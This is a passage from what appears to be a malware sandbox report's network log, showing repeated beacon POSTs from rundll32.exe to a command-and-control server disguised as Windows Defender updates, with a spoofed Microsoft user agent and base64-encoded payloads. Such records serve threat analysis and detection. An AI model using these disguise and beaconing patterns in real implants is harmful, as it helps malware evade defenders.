4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:12.962136984 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50101	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:13.238703012 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:14.687602997 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50102	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:14.957022905 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:16.419425011 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50103	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:16.682105064 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:18.213695049 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50104	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:18.477878094 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:19.917018890 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50105	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:20.177321911 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:21.783751011 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50106	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:22.056694031 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:23.659586906 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50107	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:23.924823046 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:25.420092106 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50108	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:25.696484089 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:27.151818037 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50109	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:27.426747084 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:28.899471998 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50110	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:29.169501066 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:30.619853020 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50111	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:30.893989086 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:32.368727922 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:31 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50112	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
